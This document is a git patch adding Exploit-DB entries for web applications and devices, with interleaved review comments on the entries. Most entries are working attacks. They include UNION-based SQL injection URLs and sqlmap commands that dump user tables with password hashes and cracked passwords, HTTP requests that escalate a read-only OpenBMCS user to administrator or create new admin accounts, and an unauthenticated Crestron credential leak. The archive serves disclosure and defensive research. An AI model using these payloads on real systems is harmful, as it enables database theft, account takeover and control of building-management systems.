From eb2b6f5cfddfba40bf47f1865603224e53490977 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 19 Jan 2022 05:01:58 +0000 Subject: [PATCH] DB: 2022-01-19 12 changes to exploits/shellcodes WorkTime 10.20 Build 4967 - Unquoted Service Path Archeevo 5.0 - Local File Inclusion Online Resort Management System 1.0 - SQLi (Authenticated) OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) OpenBMCS 2.4 - SQLi (Authenticated) OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) OpenBMCS 2.4 - Information Disclosure Simple Chatbot Application 1.0 - Remote Code Execution (RCE) Simple Chatbot Application 1.0 - 'message' Blind SQLi Nyron 1.0 - SQLi (Unauthenticated) Creston Web Interface 1.0.0.2159 - Credential Disclosure --- exploits/aspx/webapps/50674.txt | 21 +++ exploits/hardware/webapps/50675.txt | 151 +++++++++++++++ exploits/php/webapps/50666.txt | 88 +++++++++ exploits/php/webapps/50667.txt | 54 ++++++ exploits/php/webapps/50668.txt | 73 ++++++++ exploits/php/webapps/50669.txt | 275 ++++++++++++++++++++++++++++ exploits/php/webapps/50670.txt | 95 ++++++++++ exploits/php/webapps/50671.txt | 109 +++++++++++ exploits/php/webapps/50672.txt | 111 +++++++++++ exploits/php/webapps/50673.txt | 37 ++++ exploits/windows/local/50664.txt | 55 ++++++ exploits/windows/remote/50665.txt | 27 +++ files_exploits.csv | 12 ++ 13 files changed, 1108 insertions(+) create mode 100644 exploits/aspx/webapps/50674.txt create mode 100644 exploits/hardware/webapps/50675.txt create mode 100644 exploits/php/webapps/50666.txt create mode 100644 exploits/php/webapps/50667.txt create mode 100644 exploits/php/webapps/50668.txt create mode 100644 exploits/php/webapps/50669.txt create mode 100644 exploits/php/webapps/50670.txt create mode 100644 exploits/php/webapps/50671.txt create mode 100644 exploits/php/webapps/50672.txt create mode 100644 exploits/php/webapps/50673.txt create mode 100644 exploits/windows/local/50664.txt create mode 100644 exploits/windows/remote/50665.txt 
diff --git a/exploits/aspx/webapps/50674.txt b/exploits/aspx/webapps/50674.txt
new file mode 100644
index 000000000..1cb584552
--- /dev/null
+++ b/exploits/aspx/webapps/50674.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)
+# Google Dork: inurl:"winlib.aspx"
+# Date: 01/18/2021
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: http://www.wecul.pt/
+# Software Link: http://www.wecul.pt/solucoes/bibliotecas/
+# Version: < 1.0
+# Tested on: windows
+
+# 1. Description
+
+Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.
+
+
+# 2. Proof of Concept (PoC)
+
+https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='">
+
+
+# 3. Research:
+https://miguelsantareno.github.io/edp.pdf
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50675.txt b/exploits/hardware/webapps/50675.txt
new file mode 100644
index 000000000..f42be02a6
--- /dev/null
+++ b/exploits/hardware/webapps/50675.txt
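Review bot: The header of exploits/aspx/webapps/50674.txt contradicts itself on the affected release: the title says `Nyron 1.0` while the `# Version:` line says `< 1.0`, so someone checking an installation cannot tell whether 1.0 itself is affected; one of the two should be corrected against the linked research PDF. The `# Date: 01/18/2021` line is a year earlier than this 2022-01-19 commit and may be a typo for 2022. The placeholder host `vulnerable_webiste.com` is not a reserved name (and an underscore is not valid in a hostname); a reserved example name such as `nyron.example.com` avoids pointing readers at a third party. The entry also states no vendor status or fix for the `thes1` parameter.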
@@ -0,0 +1,151 @@ +# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure +# Exploit Author: RedTeam Pentesting GmbH + +Advisory: Credential Disclosure in Web Interface of Crestron Device + + +When the administrative web interface of the Crestron HDMI switcher is +accessed unauthenticated, user credentials are disclosed which are valid +to authenticate to the web interface. + +Details +======= + +Product: Crestron HD-MD4X2-4K-E +Affected Versions: 1.0.0.2159 +Fixed Versions: - +Vulnerability Type: Information Disclosure +Security Risk: high +Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E +Vendor Status: decided not to fix +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 +Advisory Status: published +CVE: CVE-2022-23178 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178 + + +Introduction +============ + +"Crestron sets the gold standard for network security by leveraging the +most advanced technologies including 802.1x authentication, AES +encryption, Active Directory® credential management, JITC Certification, +SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to +provide network security at the product level." + +(from the vendor's homepage) + + +More Details +============ + +Upon visiting the device's web interface using a web browser, a login +form is displayed requiring to enter username and password to +authenticate. The analysis of sent HTTP traffic revealed that in +addition to the loading of the website, a few more HTTP requests are +automatically triggered. One of the associated responses contains a +username and a password which can be used to authenticate as the +affected user. + + +Proof of Concept +================ + +Requesting the URL "http://crestron.example.com/" via a web browser +results in multiple HTTP requests being sent. 
Among others, the +following URL is requested: + +------------------------------------------------------------------------ +http://crestron.example.com/aj.html?a=devi&_=[...] +------------------------------------------------------------------------ + +This request results in a response similar to the following: + +------------------------------------------------------------------------ +HTTP/1.0 200 OK +Cache-Control: no-cache +Content-type: text/html + +{ + "login_ur": 0, + "front_val": [ + 0, + 1 + ], + "uname": "admin", + "upassword": "password" +} +------------------------------------------------------------------------ + +The values for the keys "uname" and "upassword" could be used to +successfully authenticate to the web interface as the affected user. + + +Workaround +========== + +Reachability over the network can be restricted for access to the web +interface, for example by using a firewall. + + +Fix +=== + +No fix known. + + +Security Risk +============= + +As user credentials are disclosed to visitors of the web interface they +can directly be used to authenticate to it. The access allows to modify +the device's input and output settings as well as to upload and install +new firmware. Due to ease of exploitation and gain of administrative +access this vulnerability poses a high risk. + + +Timeline +======== + +2021-10-06 Vulnerability identified +2021-11-15 Customer approved disclosure to vendor +2021-12-08 Vendor notified +2021-12-15 Vendor notified again +2021-12-21 Vendor response received: "The device in question doesn't support + Crestron's security practices. We recommend the HD-MD-4KZ alternative." +2021-12-22 Requested confirmation, that the vulnerability will not be addressed. +2021-12-28 Vendor confirms that the vulnerability will not be corrected. 
+2022-01-12 Advisory released + + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://www.redteam-pentesting.de/jobs/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/50666.txt b/exploits/php/webapps/50666.txt new file mode 100644 index 000000000..efa9bf019 --- /dev/null +++ b/exploits/php/webapps/50666.txt 
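Review bot: The `# Exploit Title:` line of 50675.txt spells the vendor `Creston`, while the advisory body and the vendor URL use `Crestron`, so a search of the archive by vendor name will miss this entry; the title should read `# Exploit Title: Crestron HD-MD4X2-4K-E 1.0.0.2159 - Credential Disclosure`. The same misspelling is in the commit subject, and the files_exploits.csv row added by this commit (not visible here) presumably carries it too. The CVE appears only in the body; a `# CVE: CVE-2022-23178` header line would make it findable alongside the title. Since the vendor status is "decided not to fix", the network-restriction workaround is the only mitigation the advisory offers and deserves a place near the top.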
@@ -0,0 +1,88 @@ +# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated) +# Date: 15/01/2022 +# Exploit Author: Gaurav Grover +# Vendor Homepage: +# Software Link: +# Version: 1.0 +# Tested on: Linux and windows both + +Summary: + +There are a vulnerabilities in Online Resort Management System (ORMS) +1. The attacker can easily retrieved the database using sql injection. + +Proof of concepts : + + +Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below: + +1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id= + + +2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+ + + +3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+ + + +4. (Database Name :- orms_db) + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+ + + +5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+ + + +6. (Username Password :- User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea + + Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+ + + +------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below: + + + +1. 
Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs + +available databases [8]: + +[*] clinic_db +[*] information_schema +[*] mtms_db +[*] mysql +[*] orms_db +[*] performance_schema +[*] phpmyadmin +[*] test + + +2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables + +Database: mtms +[6 tables] ++------------------+ +| activity_list | +| message_list | +| reservation_list | +| room_list | +| system_info | +| users | ++------------------+ + + + +3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump + +Database: orms_db +Table: users +[2 entries] ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ +| id | type | status | avatar | username | lastname | password | firstname | middlename | last_login | date_added | date_updated | ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ +| 1 | 1 | 1 | uploads/avatar-1.png?v=1639468007 | admin | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 | +| 5 | 2 | 1 | uploads/avatar-5.png?v=1641622906 | cblake1 | Blake | cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 | ++----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+ \ No newline at end of file 
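Review bot: The manual and sqlmap sections of 50666.txt disagree about the same data, which makes the write-up hard to verify: step 6 lists the second account as `cblake` with a 33-character value `1cd74fae…ccea`, while the dump table shows `cblake1` with the 32-character `cd74fae…ccea`, and the `--tables` output is headed `Database: mtms` although the command passes `-D orms_db`. The pasted output should be re-checked against a single run. `# Vendor Homepage:` and `# Software Link:` are empty, so the affected product cannot be identified from the header. For readers fixing the application, a closing line would help: the `id` parameter of `rooms/view_room` should be bound as a query parameter, and the stored password values look like short unsalted digests (sqlmap printed the cleartext next to them), so they should be rehashed with a salted password-hashing function.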
diff --git a/exploits/php/webapps/50667.txt b/exploits/php/webapps/50667.txt new file mode 100644 index 000000000..1f3b6e15c --- /dev/null +++ b/exploits/php/webapps/50667.txt @@ -0,0 +1,54 @@ +# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 CSRF Send E-mail + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5691 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php + + +26.10.2021 + +-- + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50668.txt b/exploits/php/webapps/50668.txt new file mode 100644 index 000000000..eb03fcb46 --- /dev/null +++ b/exploits/php/webapps/50668.txt 
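Review bot: This entry (50667.txt) and the four other OpenBMCS 2.4 entries added in this commit (50668.txt to 50671.txt) have no vendor-status, fixed-version or workaround field, so a reader cannot tell whether 2.4 is still the shipped release or what to do until a fix exists. The Crestron entry in the same commit (50675.txt) shows the fields to copy: `Fixed Versions:`, `Vendor Status:` and a `Workaround` section. In this file the heading says `CSRF Send E-mail` but the `Desc:` paragraph only speaks of "certain actions"; naming the affected function in the description would let an operator judge exposure without reading the PoC. A line such as `Workaround: restrict network access to the web interface` would match what the Crestron advisory recommends.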
@@ -0,0 +1,73 @@ +# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Authenticated SQL Injection + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via +the 'id' GET parameter is not properly sanitised before being returned to the +user or used in SQL queries. This can be exploited to manipulate SQL queries +by injecting arbitrary SQL code. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Semen 'samincube' Rozhkov + @zeroscience + + +Advisory ID: ZSL-2022-5692 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php + + +26.10.2021 + +-- + + +The following PoC request demonstrates the issue (authenticated user session is required): + +GET /debug/obix_test.php?id=1%22 HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ssid123ssid123ssid1234ssid +Connection: close + + +Response: + +HTTP/1.1 200 OK +Date: Sat, 1 Jan 2022 15:09:54 GMT +Server: Apache/2.4.10 (Debian) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 629 +Connection: close +Content-Type: text/html; charset=UTF-8 + +
+Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146 +Stack trace: +#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...') +#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true) +#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config') +#3 {main} + thrown in /var/www/openBMCS/classes/dbconnection.php on line 146
\ No newline at end of file diff --git a/exploits/php/webapps/50669.txt b/exploits/php/webapps/50669.txt new file mode 100644 index 000000000..370193a63 --- /dev/null +++ b/exploits/php/webapps/50669.txt 
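Review bot: The quoted response in 50668.txt carries `Server: Apache/2.4.10 (Debian)`, which is not among the `Tested on:` platforms (Apache/2.4.41 on Ubuntu, Apache/2.4.25 on Debian), so either the list or the capture comes from a different host and the two should be reconciled. The response also shows a second problem that `Desc:` does not mention: the uncaught `PDOException` is rendered to the client with absolute paths and a stack trace (`/var/www/openBMCS/classes/dbconnection.php:146`), which means error display is enabled on the tested system. A short remediation note would complete the entry: bind `id` as a parameter in the query issued from `obix.functions.php`, turn off error display to clients, and keep `/debug/` out of production deployments.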
@@ -0,0 +1,275 @@ +# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Create Admin / Remote Privilege Escalation + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: The application suffers from an insecure permissions and privilege +escalation vulnerability. A regular user can create administrative users +and/or elevate her privileges by sending an HTTP POST request to specific +PHP scripts in '/plugins/useradmin/' directory. + +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5693 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php + + +26.10.2021 + +-- + + +List current ID and permissions (read): +--------------------------------------- + +POST /plugins/useradmin/getUserDetails.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 16 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: 
https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +id_list%5B%5D=17 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:56:53 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 692 +Connection: close +Content-Type: text/html; charset=UTF-8 + +[{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}] + + + +List current ID and permissions (admin): +---------------------------------------- + +POST /plugins/useradmin/getUserDetails.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 16 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +id_list%5B%5D=18 + +HTTP/1.1 200 OK +Date: Tue, 16 
Nov 2021 20:56:36 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Vary: Accept-Encoding +Content-Length: 725 +Connection: close +Content-Type: text/html; charset=UTF-8 + +[{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}] + + + +Escalate privileges: +-------------------- + +POST /plugins/useradmin/update_user_permissions.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 702 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + 
+permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:58:48 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + +2 + + + +Create admin from read user: +---------------------------- + +POST /plugins/useradmin/create_user.php HTTP/1.1 +Host: 192.168.1.222 +Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 +Content-Length: 1010 +Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + 
+user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0 + + +HTTP/1.1 200 OK +Date: Tue, 16 Nov 2021 20:18:58 GMT +Server: Apache/2.4.41 (Ubuntu) +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 20 +Connection: close +Content-Type: text/html; charset=UTF-8 + +{"status":"success"} + + + +PoC escalate from editor to admin: +---------------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + + + +PoC create admin from editor: +----------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/50670.txt b/exploits/php/webapps/50670.txt new file mode 100644 index 000000000..ac406904b --- /dev/null +++ b/exploits/php/webapps/50670.txt 
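Review bot: The captured requests in 50669.txt keep what looks like a live session identifier (`Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4`) and a test password, whereas 50668.txt in the same commit uses an obvious placeholder (`ssid123ssid123ssid1234ssid`); the `Set-Cookie` value in the response quoted in 50670.txt has the same issue. Replacing them with a marked placeholder such as `PHPSESSID=<session-id>` keeps the entries consistent. The roles are named three ways ("regular user" in `Desc:`, "read user" and "editor" in the section titles) and the numeric `permissions` levels 1 to 4 seen in the responses are never explained, so an operator cannot tell which existing accounts to treat as affected. A remediation line stating that `update_user_permissions.php` and `create_user.php` must check the caller's own `useradmin` permission on the server would complete the entry.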
@@ -0,0 +1,95 @@ +# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) +# Exploit Author: LiquidWorm +# Date: 26/10/2021 + +OpenBMCS 2.4 Unauthenticated SSRF / RFI + + +Vendor: OPEN BMCS +Product web page: https://www.openbmcs.com +Affected version: 2.4 + +Summary: Building Management & Controls System (BMCS). No matter what the +size of your business, the OpenBMCS software has the ability to expand to +hundreds of controllers. Our product can control and monitor anything from +a garage door to a complete campus wide network, with everything you need +on board. + +Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include +(RFI) vulnerability exists in OpenBMCS within its functionalities. The application +parses user supplied data in the POST parameter 'ip' to query a server IP on port +81 by default. Since no validation is carried out on the parameter, an attacker +can specify an external domain and force the application to make an HTTP request +to an arbitrary destination host. This can be used by an external attacker for +example to bypass firewalls and initiate a service and network enumeration on the +internal network through the affected application, allows hijacking the current +session of the user, execute cross-site scripting code or changing the look of +the page and content modification on current display. 
